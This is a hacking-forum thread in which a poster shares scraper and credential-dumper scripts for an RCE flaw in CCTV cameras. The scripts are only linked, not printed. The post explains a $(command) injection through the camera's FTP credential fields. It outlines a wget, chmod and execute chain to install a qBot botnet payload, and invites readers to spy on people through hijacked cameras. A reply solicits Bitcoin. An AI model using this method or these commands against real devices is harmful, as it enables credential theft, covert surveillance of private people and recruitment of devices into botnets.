Sign in or Sign up

[Exploit] CCTV Camera Scanner
Started by ZachFarlow


Rate this topic
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


1 posts in this topic
ZachFarlow Offline
Junior Member
**


Registered
Posts: 14
Threads: 10
Joined: Fri Mar 2017
Reputation: 0

CZPoints: 0 CZP
04-05-2017, 10:02 PM -
#1
This is for the RCE exploit that just came out about a week a go targeting CCTV cameras. Enjoy :) 

PHP Code:
Usage

Centos
yum 
-y update
yum 
-y install epel-release
yum install python python3 
-y

Debian
/Ubuntu
sudo apt
-get update -y
sudo apt
-get upgrade -y
sudo apt
-get install python python3 -

Commands: 
python3 scraper.py
python3 dumper.py 1000

[*] Original Post [*]
[*] Download [*]
Screenshot
[spoiler]Ok, I wrote these scripts and it would appear there are a lot of retards here. Gonna clear up a few questions I have read.

Why are you using a specified header?
-That's in the scraper, not the exploiter, if you try and make a request to shodan without the header you get blocked, the shitty web server on the cameras doesn't need a header.

How do I use this?
-If your asking this question your probably shouldn't use it at all, in short, all it does at the moment is leaks the usernames and passwords from these cameras. The scraper or "scanner" as some people are calling it, all it does is scrape shodan for the devices.

How do I load to qBot?
-If you read the documentation you will see that there is a RCE possible, I have been extensively testing this and I cannot get it to work, il explain below why and how. Essentially, if I cant make a botnet out of it, then I might as well let you fuckers watch people through their CCTV cameras for a laugh.


RCE:

Ok, here's the deal, the RCE works by setting the username or password of the FTP to $(command), for those who don't know, $() is a linux thing that evaluates to the return of the command. For example, if I set the username for the FTP to $(pwd), the return of the command "pwd" returns the user, so on these cameras it returns "/root".

Getting a return from these commands is pretty simple, just have it connect to your test FTP server and then enable logging, you can view the username it attempts to connect with.

In theory, if we set the username to $(pwd), and have valid ftp credentials, it should attempt to connect to our FTP server with the username "/root", this will prove that it has run the command "pwd". In the github and other websites documenting this, it says that does work. In practice, the web server appears to have a mini-crash, all pages go offline for ~2 min and everything is unresponsive. There is a chance the machine may be rebooting as a result of the attempted injection, I haven't thought of a way to test that.

Loading qBot on these nerds?

Pretty sure they are running some busybox type os with a standard ish architecture so the classic, lets compile it with every compiler known to man kind, execute them all and then pray one of them works, should be just fine.

First issue is the the fact you only have 32 char for the password, 22 in some models and then around 20 ish for the username if you wanted to inject there. The result is, we can't just stick the massive qbot payload in the username box and say a prayer, it won't work.

My idea was to put the qbot payload line in a file stored on a server as "x", then inject the following commands:

wget 127.0.0.1/x
chmod 777 x
mv x x.sh
./x.sh

Due to character limitations we can't store it as x.sh, we have to settle for x and then rename it.

In my mind, that should work just fine, use the code I have already written to pull the credentials and then use the credentials to run this shit above ^^^

In practice that doesn't work, as I said above, the webserver dies when I try to inject a command.
[Image: QBPDs.gif]
[Image: QnF7Kgk.gif]

[NS]D1G174L Offline
Pentester
***


NulledSystems
Posts: 95
Threads: 19
Joined: Fri Mar 2017
Reputation: 8

CZPoints: 14 CZP
ContributorDiamondBomb ContentDonator
04-08-2017, 05:03 PM -
#2
Pretty good real thanks for sharing!
Send me BTC 1HQCPvWN1Be2UDWCBfZtsGatvQumTdYsVk




Users browsing this thread: 1 Guest(s)